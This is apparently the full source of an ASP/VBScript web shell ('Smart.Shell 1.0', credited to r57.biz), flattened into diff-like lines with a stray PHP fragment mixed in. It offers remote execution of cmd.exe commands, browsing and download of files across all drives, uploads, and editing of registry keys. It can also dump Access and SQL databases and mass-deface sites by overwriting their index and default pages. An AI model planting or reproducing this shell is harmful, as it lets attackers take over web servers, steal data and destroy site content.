Set oFile = oFS.CreateTextFile(sPath & FileName, True) + For nIndex = 1 to LenB(FileData) + oFile.Write Chr(AscB(MidB(FileData,nIndex,1))) + Next + oFile.Close + End Sub + Public Sub SaveToDatabase(ByRef oField) + If LenB(FileData) = 0 Then Exit Sub + If 
IsObject(oField) Then + oField.AppendChunk FileData + End If + End Sub +End Class +startcode = "r57.biz" +endocde = "" +onlinehelp = ".:: ONLINE HELP ::.
        " +Function HexConv(hexVar) + Dim hxx, hxx_var, multiply + IF hexVar <> "" THEN + hexVar = UCASE(hexVar) + hexVar = StrReverse(hexVar) + DIM hx() + REDIM hx(LEN(hexVar)) + hxx = 0 + hxx_var = 0 + FOR hxx = 1 TO LEN(hexVar) + IF multiply = "" THEN multiply = 1 + hx(hxx) = mid(hexVar,hxx,1) + hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var + multiply = (multiply * 16) + NEXT + hexVar = hxx_var + HexConv = hexVar + END IF +End Function +cprthtml = ".:: 3FEShell 1.0 ::." +Function get_hxno(ghx) + If ghx = "A" Then + ghx = 10 + ElseIf ghx = "B" Then + ghx = 11 + ElseIf ghx = "C" Then + ghx = 12 + ElseIf ghx = "D" Then + ghx = 13 + ElseIf ghx = "E" Then + ghx = 14 + ElseIf ghx = "F" Then + ghx = 15 + End If + get_hxno = ghx +End Function + +keydec=".:: Smart.Shell 1.0 © BY P0Uy@_$3r\/3R - ::." +Function showobj(objpath) + showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath)) +End Function +Function showobjpath(objpath) + showobjpath = Left(objpath,InstrRev(objpath,"\")) +End Function +Function checking(a,b) +' If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then +' pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error" +' Response.Redirect(pagina) +' End If +End Function +Sub hdr() + Response.Write startcode + Response.Write keydec + Response.Write "
        " +End Sub + +sub araBul(path_,ara_) + on error resume next + If Len(path_) > 0 Then + cur = path_&"\" + If cur = "\\" Then cur = "" + parent = "" + If InStrRev(cur,"\") > 0 Then + parent = Left(cur, InStrRev(cur, "\", Len(cur)-1)) + End If + Else + cur = "" + End If + + Set f = myFSO.GetFolder(cur) + + Set fc = f.Files + For Each f1 In fc + if lcase(InStr(1,f1.name,lcase(ara_)))>0 then + downStr = "?/a>" + if lcase(ara_)="mdb" then + Response.Write downStr&"?/a> * "& f1.path &" ["&f1.size&"]"&"
        " + else + Response.Write downStr&"?/a>! - "& f1.path &" ["&f1.size&"]
        " + end if + end if + Next + + Set fs = f.SubFolders + For Each f1 In fs + araBul f1.path,ara_ + Next + Set f = Nothing + Set fc = Nothing + Set fs = Nothing +end sub + + +Sub showcontent() + showdisks=TRUE + Response.Write ".:: DRIVES ::.
        .:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "

        " + If Trim(Request.QueryString("raiz")) = "root" Then + Set fs=Server.Createobject("Scripting.FileSystemObject") + Set drivecollection=fs.drives + Response.Write "" + For Each drive IN drivecollection + str=drive.driveletter & ":" + Response.Write "" & UCase(str) & "
        " + Select Case drive.DriveType + Case 0 + tipodrive = "Unknown" + nomedrive = drive.VolumeName + Case 1 + tipodrive = "Removable" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 2 + tipodrive = "Fixed" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 3 + tipodrive = "Network" + If drive.isready Then + nomedrive = drive.ShareName + Else + nomedrive = "" + End If + Case 4 + tipodrive = "CD-Rom" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + Case 5 + tipodrive = "RAM Disk" + If drive.isready Then + nomedrive = drive.VolumeName + Else + nomedrive = "" + End If + End Select + response.write "Type: " & tipodrive & "
        " + response.write "Name: " & nomedrive & "
        " + response.write "File System: " + If drive.isready Then + set sp=fs.getdrive(str) + response.write sp.filesystem & "
        " + Else + response.write "-
        " + End If + Response.Write "Disk Space: " + If drive.isready Then + freespace = (drive.AvailableSpace / 1048576) + set sp=fs.getdrive(str) + response.write(Round(freespace,1) & " MB
        ") + Else + response.write("-
        ") + End If + Response.Write "Total Space: " + If drive.isready Then + totalspace = (drive.TotalSize / 1048576) + set sp=fs.getdrive(str) + response.write(Round(totalspace,1) & " MB
        ") + Else + response.write("-
        ") + End If + Response.Write "
        " + Next + Response.Write "
        " + Set fs = Nothing + Set drivecollection = Nothing + set sp=Nothing + Else + If Trim(Request.QueryString("raiz")) = "" Then + caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) + pos = Instr(caminho,"\") + pos2 = 1 + While pos2 <> 0 + If Instr(pos + 1,caminho,"\") <> 0 Then + pos = Instr(pos + 1,caminho,"\") + Else + pos2 = 0 + End If + Wend + raiz = Left(caminho,pos) + Else + raiz = trim(Request.QueryString("raiz")) & "\" + End If + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MonRep = ObjFSO.GetFolder(raiz) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + Response.Write "MASS TEST IN " & UCase(raiz) & "

        " + Response.Write "MASS DEFACE IN " & UCase(raiz) & "

        " + Response.Write "UPLOAD FILE TO " & UCase(raiz) & "

        " + + Response.Write "" + Response.Write "PROMPT" + Response.Write " - SYS INFO" + Response.Write " - REGEDIT" + Response.Write " - SEARCH" + Response.Write " - EXECUTE SQL" + Response.Write " - ABOUT" + Response.Write "

        " + + + Response.Write "Root Folder: " & raiz & "

        " + If CInt(Len(raiz) - 1) <> 2 Then + barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1 + backlevel = Left(raiz,barrapos) + Response.Write "<DIR> . .
        " + Else + Response.Write "<DIR> . . 
        " + End If + Response.Write "" + for each folderItem in ColFolders + Response.Write "" + Response.Write "" + Response.Write "" + next + Response.Write "
        <DIR> " & showobj(folderItem.path) & "  << PUT  << Copy/Move  << Delete

        " + marcatabela = true + for each FilesItem0 in ColFiles0 + If marcatabela = true then + corfundotabela = " bgcolor=""#EEEEEE""" + Else + corfundotabela = "" + End If + Response.Write ":: " & showobj(FilesItem0.path) & "" + marcatabela = NOT marcatabela + next + Response.Write "
          " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     o.GET.o    o.REN.o    o.DEL.o    o.VIEW.o    o.EDIT.o    o.Ýndir.o    o.FileCopy.o
        " + End If +End Sub +Select Case Trim(Request.QueryString("action")) + Case "get" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + MyFile.Copy (destino) + If Err.Number = 0 Then + Response.Write "


        File: " & caminho & "
        Copied to: " & destino + End If + Case "put" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Trim(Request.QueryString("arquivo")) = "" Then + caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + varpath = Trim(Request.QueryString("path")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MonRep = ObjFSO.GetFolder(caminho) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + + Response.Write "Select File:
        " + for each FilesItem0 in ColFiles0 + Response.Write "" + next + Response.Write "
        :: " & showobj(FilesItem0.path) & "  " & FormatNumber(FilesItem0.size/1024, 0) & " Kbytes     :: SELECT ::
        " + Else + destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\" + arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(arquivo) + MyFile.Copy (destino) + If Err.Number = 0 Then + Response.Write "


        File: " & arquivo & "
        Copied to: " & destino + End If + End If + Case "del" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + MyFile.Delete + If Err.Number = 0 Then + Response.Write "" + Response.Write "


        Folder " & caminho & " Deleted.
        " + End If + + Case "fdel" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + ObjFSO.DeleteFolder caminho + If Err.Number = 0 Then + Response.Write "" + Response.Write "


        File " & caminho & " Deleted.
        " + End If + + Case "ren" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Trim(Request.QueryString("status")) <> "2" Then + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + arquivo = showobj(caminho) + Response.Write "
        " & arquivo & "
        " & _ + "
        " & _ + "" & _ + "" & _ + "" & _ + "New Name: " & _ + "  " & _ + "
        " + Else + caminho = Replace(Trim(Request.QueryString("path")),"|","\") + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname")) + MyFile.Move (destino) + If Err.Number = 0 Then + Response.Write "


        Arquivo: " & caminho & "
        renomeado para: " & destino + Response.Write "" + End If + End If + Case "error" + Response.Write "
        CÓDIGO CORROMPIDO
        CORRUPT CODE
        " + Case "cmd" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set oScript = Server.CreateObject("WSCRIPT.SHELL") + Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") + Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") + szCMD = Request.QueryString(".CMD") + If (szCMD <> "") Then + szTempFile = "c:\" & oFileSys.GetTempName( ) + Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) + Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) + End If + Response.Write "


        " + If (IsObject(oFile)) Then + On Error Resume Next + Response.Write "" + Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"
        ")," "," ") + oFile.Close + Call oFileSys.DeleteFile(szTempFile, True) + End If + Case "info" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set WshNetwork = Server.CreateObject("WScript.Network") + Set WshShell = Server.CreateObject("WScript.Shell") + Set WshEnv = WshShell.Environment("SYSTEM") + Response.Write "
        " + Response.Write "User Properties:
        " + Response.Write "UserName: " & WshNetwork.UserName & "
        " + Response.Write "Computer Name: " & WshNetwork.ComputerName & "
        " + Response.Write "User Domain: " & WshNetwork.UserDomain & "
        " + Set Drives = WshNetwork.EnumNetworkDrives + For i = 0 to Drives.Count - 1 + Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
        " + Next + Response.Write "
        Cpu Information:
        " + Response.Write "Processor Architecture: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
        " + Response.Write "Number Of Processors: " & WshEnv("NUMBER_OF_PROCESSORS") & "
        " + Response.Write "Processor Identifier: " & WshEnv("PROCESSOR_IDENTIFIER") & "
        " + Response.Write "Processor Level: " & WshEnv("PROCESSOR_LEVEL") & "
        " + Response.Write "Processor Revision: " & WshEnv("PROCESSOR_REVISION") & "
        " + Response.Write "
        Operating System Information:
        " + Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
        " + Response.Write "Sistem OS: " & WshEnv("OS") & "
        " + Response.Write "Server Software: " & request.servervariables("SERVER_SOFTWARE") & "
        " + Response.Write "Cmd Path: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
        " + Response.Write "Public Paths: " & WshEnv("PATH") & "
        " + Response.Write "Executables: " & WshEnv("PATHEXT") & "
        " + Response.Write "Prompt: " & WshEnv("PROMPT") & "
        " + Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
        " + Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
        " + Response.Write "System32 Path: " & WshShell.CurrentDirectory & "
        " + Set Drives = Nothing + Set WshNetwork = Nothing + Set WshShell = Nothing + Set WshEnv = Nothing + Case "reg" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Set WshShell = Server.CreateObject("WScript.Shell") + Response.Write "
        Registry Editor:

        " + Select Case Trim(Request.QueryString("regaction")) + Case "w" + If Trim(Request.QueryString("process")) = "yes" Then + Select Case Trim(Request.QueryString("type")) + Case "1" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ") + Case "2" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD") + Case "3" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY") + Case "4" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ") + Case "5" + teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ") + End Select + Response.Write "

        Registry " + Response.Write Trim(Request.QueryString("key")) & " Changed.
        " + Response.Write "

        Main Menu
        " + Else + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        ROOT KEY NAMEABREVIAÇÃO
        HKEY_CURRENT_USER HKCU
        HKEY_LOCAL_MACHINE HKLM
        HKEY_CLASSES_ROOT HKCR
        HKEY_USERS HKEY_USERS
        HKEY_CURRENT_CONFIG HKEY_CURRENT_CONFIG

        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        Type Description Figure
        REG_SZ String String
        REG_DWORD Number DWORD
        REG_BINARY Binary VBArray DWORD
        REG_EXPAND_SZ String Expand (ex. ""%windir%\\calc.exe"") String
        REG_MULTI_SZ Array Of Strings VBArray Of Strings
        " + Response.Write "

        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        KEY:
        ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        VALUE:
        TYPE:
        " + Response.Write "" + Response.Write "" + Response.Write "
        " + Response.Write "

        Main Menu
        " + End If + Case "r" + If Trim(Request.QueryString("process")) = "yes" Then + Response.Write "" & Trim(Request.QueryString("key")) & "
        " + Response.Write "Value: " & WshShell.RegRead (Trim(Request.QueryString("key"))) + Else + Response.Write "
        " + Response.Write "KEY:
        ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + End If + Response.Write "

        Main Menu
        " + Case "d" + If Trim(Request.QueryString("process")) = "yes" Then + teste = WshShell.RegDelete (Trim(Request.QueryString("key"))) + Response.Write "Chave " & Trim(Request.QueryString("key")) & " Deleted." + Else + Response.Write "
        " + Response.Write "KEY: ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "" + End If + Response.Write "

        Main Menu
        " + Case Else + Response.Write "WRITE VALUE

        " + Response.Write "READ VALUE

        " + Response.Write "DELETE KEY
        " + End Select + Set WshShell = Nothing + Case "txtview" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp & "" + file = Replace(Trim(Request.QueryString("file")),"|","\") + Set fso = CreateObject("Scripting.FileSystemObject") + Set a = fso.OpenTextFile(file) + Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"
        ")," "," ") + Set a = Nothing + Set fso = Nothing + Case "txtedit" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + If Request.Form.Count = 0 Then + file = Replace(Trim(Request.QueryString("file")),"|","\") + Set fso = CreateObject("Scripting.FileSystemObject") + Set a = fso.OpenTextFile(file) + Response.Write "
        " + Response.Write "
        " + Response.Write "" + Response.Write "     
        " + Set a = Nothing + Set fso = Nothing + Else + Select Case Trim(Request.Form("savemethod")) + Case "Save" + Set fso = CreateObject("Scripting.FileSystemObject") + novotexto = Trim(Request.Form("content")) + novotexto = Split(novotexto,vbCrLf) + Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2) + For i = 0 To UBound(novotexto) + objstream.WriteLine(novotexto(i)) + Next + objstream.Close + Set objstream = Nothing + Response.Write "Texto salvo: " & Replace(Trim(Request.Form("path")),"|","\") & "" + Case "Save as" + Set fso = CreateObject("Scripting.FileSystemObject") + novotexto = Trim(Request.Form("content")) + novotexto = Split(novotexto,vbCrLf) + caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" + Set objstream = fso.CreateTextFile(caminho,true,false) + For i = 0 To UBound(novotexto) + objstream.WriteLine(novotexto(i)) + Next + objstream.Close + Set objstream = Nothing + Response.Write "
        " + Response.Write "
        " + Response.Write "" + Response.Write "
        " + Case Else + caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt" + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + Set MyFile = ObjFSO.GetFile(caminho) + destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename")) + MyFile.Move (destino) + If Err.Number = 0 Then + Response.Write "


        Arquivo: " & destino & " salvo!" + Response.Write "" + End If + End Select + End If + Case "download" + Response.Buffer = True + Response.Clear + strFileName = Replace(Trim(Request.QueryString("file")),"|","\") + strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\")) + strFileType = Request.QueryString("type") + if strFileType = "" then strFileType = "application/download" + Set fso = Server.CreateObject("Scripting.FileSystemObject") + Set f = fso.GetFile(strFilename) + intFilelength = f.size + Set f = Nothing + Set fso = Nothing + Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile + Response.AddHeader "Content-Length", intFilelength + Response.Charset = "UTF-8" + Response.ContentType = strFileType + Set Stream = Server.CreateObject("ADODB.Stream") + Stream.Open + Stream.type = 1 + Stream.LoadFromFile strFileName + Response.BinaryWrite Stream.Read + Response.Flush + Stream.Close + Set Stream = Nothing + Case "upload" + If Request.QueryString("processupload") <> "yes" Then + Response.Write "
        " + Response.Write "" + Response.Write "" + Response.Write "" + Response.Write "
        Select a file to upload:
        " + Else + Set Uploader = New FileUploader + Uploader.Upload() + If Uploader.Files.Count = 0 Then + Response.Write "File(s) not uploaded." + Else + For Each File In Uploader.Files.Items + File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\") + Response.Write "File Uploaded: " & File.FileName & "
        " + Response.Write "Size: " & File.FileSize & " bytes
        " + Response.Write "Type: " & File.ContentType & "

        " + Response.Write "" + Next + End If + End If + Case "mass" + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) + On Error Resume Next + Set MonRep = ObjFSO.GetFolder(caminhodomass) + Set ColFolders = MonRep.SubFolders + for each folderItem in ColFolders + destino1 = folderItem.path & "\index.htm" + destino2 = folderItem.path & "\index.html" + destino3 = folderItem.path & "\index.asp" + destino4 = folderItem.path & "\index.cfm" + destino5 = folderItem.path & "\index.php" + destino6 = folderItem.path & "\default.htm" + destino7 = folderItem.path & "\default.html" + destino8 = folderItem.path & "\default.asp" + destino9 = folderItem.path & "\default.cfm" + destino10 = folderItem.path & "\default.php" + MeuArquivo.Copy(destino1) + MeuArquivo.Copy(destino2) + MeuArquivo.Copy(destino3) + MeuArquivo.Copy(destino4) + MeuArquivo.Copy(destino5) + MeuArquivo.Copy(destino6) + MeuArquivo.Copy(destino7) + MeuArquivo.Copy(destino8) + MeuArquivo.Copy(destino9) + MeuArquivo.Copy(destino10) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "
        <DIR> " & folderItem.path & "  DONE!
          " & UCase(Err.Description) & "
        " + End If + Err.Number = 0 + Response.Flush + If metodo = "brute" Then + Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) + End If + next + End Sub + Sub brutemass(caminho,massaction) + If massaction = "test" Then + On Error Resume Next + Set MonRep = ObjFSO.GetFolder(caminho) + Set ColFolders = MonRep.SubFolders + Set ColFiles0 = MonRep.Files + for each folderItem in ColFolders + Set TotalFolders = ObjFSO.GetFolder(folderItem.path) + Set EachFolder = TotalFolders.SubFolders + Response.Write "" + maindestino = folderItem.path & "\" + MeuArquivo.Copy(maindestino) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + If EachFolder.count > 0 Then + masscontador = 0 + for each subpasta in EachFolder + masscontador = masscontador + 1 + destino = subpasta.path & "\" + If masscontador = 1 Then + destinofinal = destino + pathfinal = subpasta.path + Err.Number = 0 + MeuArquivo.Copy(destinofinal) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + Else + MeuArquivo.Copy(destino) + Response.Write "" + If Err.Number = 0 Then + Response.Write "" + Else + Response.Write "" + End If + Err.Number = 0 + Response.Flush + End If + next + masscontador = 0 + End If + Response.Write "
        <DIR> " & maindestino & "  Acesso Permitido
          " & UCase(Err.Description) & "
        <DIR> " & showobj(pathfinal) & "  Acesso Permitido
          " & UCase(Err.Description) & "
        <DIR> " & showobj(subpasta.path) & "  Acesso Permitido
          " & UCase(Err.Description) & "

        " + Call brutemass(folderItem.path & "\","test") + next + Set MonRep = Nothing + Set ColFolders = Nothing + Set ColFiles0 = Nothing + Else + If Request.Form.Count = 0 Then + Response.Write "

        Brute: Test and Deface root and sub directories.

        " + Response.Write "Single: Test and deface only root directories.

        " + Response.Write "" + Response.Write "" + Response.Write "
        Deface Code:
        " + Response.Write "
        " + Response.Write "Brute   " + Response.Write "Single
        " + Response.Write "
        " + Response.Write "" + Else + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + arquivomassdfc = patharquivotxt & "teste.txt" + Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) + vetordelinhas = Split(Request.Form("content"),VbCrLf) + For i = 0 To UBound(vetordelinhas) + Arquivotxt.WriteLine(vetordelinhas(i)) + Next + Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) + + If Request.Form("massopt") = "single" Then + Call themassdeface(caminho,"single",ObjFSO,MeuArquivo) + ElseIf Request.Form("massopt") = "brute" Then + Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) + End If + End If + End If + End Sub + If Trim(Request.QueryString("massact")) = "test" Then + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) + arquivo = patharquivotxt & "_vti_cnf.log" + Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True) + Set MeuArquivo = ObjFSO.GetFile(arquivo) + Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test") + ElseIf Trim(Request.QueryString("massact")) = "dfc" Then + Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc") + End If + Case "fcopy" + If Trim(Request.Form("submit1")) = "Copy" Then + mptpath=Trim(Request.Form("path")) + mptdest=Trim(Request.Form("cf")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + isl = "" + if Trim(Request.Form("islem"))="kopyala" then + objFSO.CopyFolder mptpath,mptdest + isl="Copied.." + elseif Trim(Request.Form("islem"))="tasi" then + objFSO.MoveFolder mptpath,mptdest + isl="moved.." + end if + + response.Write "Command: "&isl + response.Write "
        File From: " & mptpath & "
        Copy to: " & mptdest + response.Write "
        " + Else + Response.Write "
        " + Response.Write "
        Copy Path : " + Response.Write "" + Response.Write "" + response.Write "" + Response.Write "
        " + response.Write "Copy" + response.Write "Move" + response.Write "
        " + response.Write "
        " + End IF + + Case "filecopy" + If Trim(Request.Form("submit1")) = "Copy" Then + mptpath=Trim(Request.Form("path")) + mptdest=Trim(Request.Form("cf")) + Set ObjFSO = CreateObject("Scripting.FileSystemObject") + isl = "" + if Trim(Request.Form("islem"))="kopyala" then + objFSO.CopyFile mptpath,mptdest + isl="Copy.." + elseif Trim(Request.Form("islem"))="tasi" then + objFSO.MoveFile mptpath,mptdest + isl="move.." + end if + + response.Write "Command: "&isl + response.Write "
        File From: " & mptpath & "
        Copy to: " & mptdest + response.Write "
        " + Else + Response.Write "
        " + Response.Write "
        Copy Path : " + Response.Write "" + Response.Write "" + response.Write "" + Response.Write "
        " + response.Write "Copy" + response.Write "Move" + response.Write "
        " + response.Write "
        " + End IF + + + Case "search" + If (Trim(Request.Form("submit1")) = "Search") xor Trim(Request.QueryString("status"))<>"" Then + showdisks=FALSE + status5=Trim(Request.Form("status")) + if status5="" then status5=Trim(Request.QueryString("status")) + SELECT CASE status5 + + CASE "5" + Response.Write "
        "& Trim(Request.QueryString("path")) &"

        " + Response.Write "\n"; +} +echo htmlhead($hsafemode); +echo "
        " + set f = objFSO.OpenTextFile(Trim(Request.QueryString("path")),1) + Response.Write "
        "&Server.HTMLEncode(f.readAll)&"
        " + if err.number=62 then Response.Write "":Response.End + + + + CASE "7": + Response.Write "Tables

        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objADOX = Server.CreateObject("ADOX.Catalog") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objADOX.ActiveConnection = objConn + + For Each table in objADOX.Tables + If table.Type = "TABLE" Then + Response.Write "4 "&table.Name&"
        " + End If + Next + + CASE "8": + table=Trim(Request.QueryString("table")) + Response.Write "

        Table Name: " & table & "




        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objRcs = Server.CreateObject("ADODB.RecordSet") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objRcs.Open table,objConn, adOpenKeyset , , adCmdText + + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + do while not objRcs.EOF + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + objRcs.MoveNext + loop + Response.Write "
           "&objRcs.Fields(i).Name&"   
        "&objRcs.Fields(i).Value&" 

        " + + + case "12": araBul Trim(Request.Form("path")),Trim(Request.Form("arama")) + + END SELECT + + Else + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write "
        " + Response.Write "
        File Ext: " + Response.Write " " + Response.Write "" + Response.Write "
        " + End IF + + + + Case "sqlserver" + If (Trim(Request.Form("submit1")) = "Execute SQL Server Command") xor Trim(Request.QueryString("status"))<>"" Then + showdisks=FALSE + status5=Trim(Request.Form("status")) + if status5="" then status5=Trim(Request.QueryString("status")) + SELECT CASE status5 + + + CASE "7": + Response.Write "Tables

        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objADOX = Server.CreateObject("ADOX.Catalog") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objADOX.ActiveConnection = objConn + + For Each table in objADOX.Tables + If table.Type = "TABLE" Then + Response.Write "4 "&table.Name&"
        " + End If + Next + + CASE "8": + table=Trim(Request.QueryString("table")) + Response.Write "

        Table Name: " & table & "




        " + Set objConn = Server.CreateObject("ADODB.Connection") + Set objRcs = Server.CreateObject("ADODB.RecordSet") + objConn.Provider = "Microsoft.Jet.Oledb.4.0" + objConn.ConnectionString = Trim(Request.QueryString("path")) + objConn.Open + objRcs.Open table,objConn, adOpenKeyset , , adCmdText + + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + do while not objRcs.EOF + Response.Write "" + for i=0 to objRcs.Fields.count-1 + Response.Write "" + next + Response.Write "" + objRcs.MoveNext + loop + Response.Write "
           "&objRcs.Fields(i).Name&"   
        "&objRcs.Fields(i).Value&" 

        " + + + END SELECT + + Else + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + + Response.Write "
        " + Response.Write "
        SQL Server connection string:
        " + Response.Write "" + Response.Write "
        " + response.Write "" + Response.Write "
        " + response.Write "
        " + + End IF + + + + Case "about" + showdisks=FALSE + checa = checking(cprthtml,keydec) + Call hdr() + response.Write "


        Coded By S3rver" + response.Write "

        " + response.Write "r57.biz" + response.Write "
        " + response.Write "E-Mail:thesabotaqe@gmail.com" + response.Write "

        " + response.Write "r57.biz" + + + Case Else + checa = checking(cprthtml,keydec) + Call hdr() + Response.Write copyright & onlinehelp + Call showcontent() +End Select +If Err.Number <> 0 Then + Response.Write "
        ERRO: " & Err.Number & "

        " & UCase(Err.Description) & "
        Acesse denied." +End If +Response.Write endcode + +if showdisks then + +%> + + + + +<% + + + Set objFSO = Server.CreateObject("Scripting.FileSystemObject") + + Response.Write "


        " + for each drive_ in objFSO.Drives + Response.Write "" + next + Response.Write "" + Response.Write "
        Drives
